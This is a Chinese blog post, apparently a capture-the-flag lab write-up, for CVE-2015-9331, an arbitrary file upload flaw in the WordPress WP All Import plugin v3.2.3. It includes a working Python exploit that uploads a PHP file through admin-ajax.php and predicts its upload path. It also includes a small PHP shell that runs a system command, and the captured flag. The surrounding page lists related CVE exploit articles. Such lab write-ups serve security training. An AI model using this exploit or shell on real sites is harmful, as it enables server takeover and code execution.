春秋云镜 CVE-2015-9331

最新推荐文章于 2024-06-21 15:12:56 发布
最新推荐文章于 2024-06-21 15:12:56 发布
阅读量621 收藏
点赞数 1
分类专栏: 靶场 文章标签: android 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/132807355
版权

春秋云镜 CVE-2015-9331 wordpress插件 WordPress WP All Import plugin v3.2.3 任意文件上传

靶标介绍

wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传,可以上传shell。

启动场景

在这里插入图片描述

漏洞利用

exp

#/usr/local/bin/python3
# -*-coding:utf-8-*-
 
import requests,os
site="eci-2ze8y6cz5vszwgd99u5d.cloudeci1.ichunqiu.com"
file_to_upload ='shell.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print ("http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/%s" % "evil.php")

site处填域名,file_to_upload处填shell文件名。
shell如下

<?php
system('cat /flag');phpinfo();
?>

执行exp脚本
在这里插入图片描述
访问链接
在这里插入图片描述
得到flag

flag{3df8d04f-d7cd-4b22-a2aa-25ca6e8dde62}

isbug0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FREAK-Attack-CVE-2015-0204-Testing-Script:根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本
06-20
根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本。 它是一个免费软件,不需要别人的服务器来运行。 您的服务器在正常情况下必须通过 SSL Labs 测试获得 A+ 的...
CVE-2015-5119_walkthrough:文章CVE-2015-5119 Flash ByteArray UaF的存档
05-10
CVE-2015-5119_walkthrough
春秋云镜CVE-2015-9331 必获取flag,来抄
HMX404的博客
01-31 557
wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传,可以上传shell。
CVE10大漏洞总结【网络安全
heikeyouyou的博客
05-19 2936
网络安全cve十大漏洞总结
wordpress数据导入插件WP ALL Import使用教程
ChanYao的专栏
02-24 4176
当你要迁移站点,或者出于某种原因,需要把数据导入到wordpress的时候,而且这个数据量还非常多的时候,wordpress自带的导出导入工具用起来就不太方便了。 假如你采集了成千上万条数据,且存在了excle表格里面,你想把它导入到文章里面,辣么接下来介绍的方法和插件正和你意:wp-all-import-pro插件。 我曾经用这个插件把excel里面的14万行数据导入到wordpress的文章里面, 它支持XML和CVS文件直接导入,说到这里是不是很熟悉了,CVS格式的文件,就是表格。 ..
(环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞
daxi0ng的博客
09-25 1875
0x00 简介 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案! 0x01 漏洞概述 安全人员进行调查时,很快发现WordPress插件.
春秋云镜 CVE-2023-26469
qq274575499的博客
03-29 1465
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
春秋云镜 CVE-2015-1427
qq_22002773的博客
09-14 173
春秋云镜 CVE-2015-1427
春秋云镜 CVE-2023-1313
qq274575499的博客
04-03 786
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
春秋云镜 CVE-2020-25540
qq_22002773的博客
08-07 519
春秋云镜 CVE-2020-25540
春秋云镜 CVE-2019-16113
qq_22002773的博客
08-24 781
春秋云镜 CVE-2019-16113
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /...然后尝试: ...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
juniper-cve-2015-7755:从Juniper ScreenOS中对CVE-2015-7755和CVE-2015-7756问题的分析得出的注释,二进制文件和相关信息
05-25
瞻博网络CVE-2015-7755和CVE-2015-7756 该存储库包含笔记,二进制文件和有关Juniper ScreenOS中CVE-2015-7755和CVE-2015-7756问题的分析的相关信息。 有关这些问题的更多信息,请参见下面的URL: 发现CVE-2015-7755...
工作实践:11种API性能优化方法
最新发布
BUG指挥课堂
06-21 519
上面这个例子中,发站内通知和用户操作日志功能,对实时性要求不高,即使晚点写库,用户无非是晚点收到站内通知,或者运营晚点看到用户操作日志,对业务影响不大,所以完全可以异步处理。但是,如果一次性查询的用户数量太多,例如一次查询2000个用户的数据,传入2000个用户的ID进行远程调用时,用户查询接口经常会出现超时的情况。这种情况下,接口的一次请求会涉及到非常长的调用链路。当系统发展到一定阶段,用户并发量增加,会有大量的数据库请求,这不仅需要占用大量的数据库连接,还会带来磁盘IO的性能瓶颈问题。
Android-NDK开发Crash错误定位
2401_85667530的博客
06-17 574
从上图的目录结构中可以看出来,NDK针对不同的CPU架构实现了多套相同的工具。所以在选择addr2line和objdump工具的时候,要根据你目标机器的CPU架构来选择。如果是arm架构,选择arm-linux-androidabi-4.6/4.8(一般选择高版本)。x86架构,选择x86-4.6/4.8。mipsel架构,选择mipsel-linux-android-4.6/4.8。
Android中的消息异步处理机制及实现方案
FlyingFish868的博客
06-15 1112
Android UI 是非线程安全的,即所有的 UI 操作必须在主线程中执行;任何在工作线程中直接对 UI 进行操作都会导致不可预知的行为,甚至可能导致应用崩溃;消息异步处理机制确保了所有的 UI 更新都在主线程中执行,从而保证了线程安全
android CancellationException 了解
阿饱同学
06-21 178
Android开发中,通常是在协程或预期完成的任务被取消时遇到的异常。这种异常是Kotlin协程的一部分,也可以在各种异步任务管理库中找到。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值